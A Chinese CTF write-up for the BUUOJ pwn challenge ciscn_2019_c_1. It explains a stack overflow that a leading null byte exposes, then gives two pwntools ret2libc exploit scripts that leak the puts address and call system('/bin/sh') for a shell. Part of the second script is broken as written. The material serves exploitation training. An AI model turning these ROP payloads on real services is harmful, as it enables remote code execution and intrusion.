查看保护状态
打开ida查看发现不存在后门函数,这道题目也没有给我libc,那么这里借助写入ret2libc来实现getshell
题目给了是ubuntu18的版本,
IDA中发现,存在一个栈溢出,并且看到了一个strlen 只需要放一个\0截断即可,这样我们输入的数据就不会被加密处理,(这里的加密方式只是简单的异或,异或两次也能恢复原来的值)
在leak出来的数据前面有一些无效的字符,所以在接收puts地址的时候需要先recvline两次
EXP
(如果需要打远程,请使用LibcSearcher,否则请使用正确的libc版本)
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
p = process("./ciscn_2019_c_1")
#p = remote("node4.buuoj.cn","28569")
elf = ELF("./ciscn_2019_c_1")
ret=0x4006b9
rdi=0x400c83
main=elf.sym['main']
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
p.recvuntil('choice!\n')
p.sendline('1')
payload='\0'+'a'*(0x50-1+8)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.recvuntil("encrypted\n")
p.sendline(payload)
#gdb.attach(p)
p.recvline()
p.recvline()
puts_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
print "puts is:"+hex(puts_addr)
#gdb.attach(p)
libc = ELF("./libc-2.27.so")
libc_base=puts_addr-libc.sym['puts']
system_addr=libc_base+libc.sym['system']
bin_sh=libc_base+next(libc.search("/bin/sh"))
print "libc_base is "+hex(libc_base)
print "system_addr is "+hex(system_addr)
print "str_bin_sh is "+hex(bin_sh)
payload1='\0'+'a'*(0x50-1+8)+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system_addr)
p.sendlineafter("Input your choice!\n","1")
p.sendlineafter("Input your Plaintext to be encrypted\n",payload1)
p.interactive()
EXP2
另一种写法
from pwn import *
from LibcSearcher import *
# io = process('./ciscn_2019_c_1')
io = remote("node4.buuoj.cn","28569")
elf = ELF('./ciscn_2019_c_1')
# libc=ELF('./libc-2.27.so')
context.log_level='debug'
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
pop_rdi_ret = 0x0000000000400c83
main_addr = 0x400B28
ret = 0x00000000004006b9
io.recvuntil('Input your choice!\n')
io.sendline('1')
io.recvuntil('Input your Plaintext to be encrypted\n')
payload='a'*(0x50+8)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
payload2=[]
def decrypt(content):
for i in range(0,len(content)):
if(ord(content[i])<=96 or ord(content[i])>122):
if(ord(content[i])<=64 or ord(content[i])>90):
if(ord(content[i])>47 or ord(content[i])<=57):
payload2.append(ord(content[i])^0xf)
continue
else:
payload2.append(ord(content[i])^0xe)
continue
else:
payload2.append(ord(content[i])^0xd)
continue
decrypt(payload)
payload2 = bytearray(payload2)
print "payload2----->" + payload2
# pause()
io.sendline(payload)
io.recvuntil('\x40\x0a')#@C
puts_addr = u64(io.recv(6).ljust(8,'\x00'))
libc = LibcSearcher('puts',puts_addr)
# libc_base = puts_addr - libc.sym['puts']
libc_base = puts_addr - libc.dump('puts')
print "libc_base----->" + hex(libc_base)
# system=libc.sym['system']
system=libc.dump('system')
binsh = libc
system_addr = libc_base+system
binsh_addr = libc_base+libc.dump('str_bin_sh')
# binsh_addr=next(libc.search("/bin/sh"))+libc_base
payload = 'a'*(0x50+8)+p64(ret)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
io.recvuntil('Input your choice!\n')
io.sendline('1')
io.recvuntil('Input your Plaintext to be encrypted\n')
# gdb.attach(io,'b *0x400AE8')
io.sendline(payload)
io.interactive()
发表评论